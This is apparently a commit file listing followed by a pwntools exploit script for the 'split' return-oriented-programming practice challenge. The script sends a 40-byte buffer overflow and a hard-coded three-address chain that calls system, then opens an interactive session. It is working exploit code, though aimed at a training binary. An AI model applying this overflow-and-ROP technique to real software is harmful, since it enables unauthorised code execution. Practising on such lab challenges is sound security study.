
new file: x86_64/ret2win/core new file: x86_64/ret2win/exploit.py new file: x86_64/split/.gdb_history new file: x86_64/split/core new file: x86_64/split/core.split.25050 new file: x86_64/split/exploit.py new file: x86_64/split/fuckyou new file: x86_64/split/xaa
#!/usr/bin/env python3
from pwn import *
# Load the local ./split ELF so pwntools adopts its architecture and byte
# order for the packing helpers used below.
context.binary = "./split"

# Start the target as a child process; the script then writes to its stdin.
prog = process('./split')

# Input layout, in order:
#   1. 40 filler bytes (the original comment read "originally 40"); presumably
#      the distance from the start of the buffer to the saved return address
#      -- confirm against the binary.
#   2. three 8-byte words packed by p64(), placed directly after the filler.
# NOTE(review): every address below is a hard-coded absolute value, so this
# input only matches a build of ./split loaded at fixed addresses. Presumably
# the target is non-PIE and built without a stack canary -- confirm with
# checksec. A canary or a position-independent build would invalidate this
# input as written.
chain = (
    # NOTE(review): undocumented in the original; presumably a gadget that
    # loads the following word into the first-argument register -- confirm.
    0x00000000004007c3,
    0x0000000000601060,  # usefulString
    0x000000000040074b,  # usefulFunction + offset
)
payload = b'a' * 40 + b''.join(p64(word) for word in chain)

# Send the input followed by a newline, then hand the terminal to the
# process so its output can be read interactively.
prog.sendline(payload)
prog.interactive()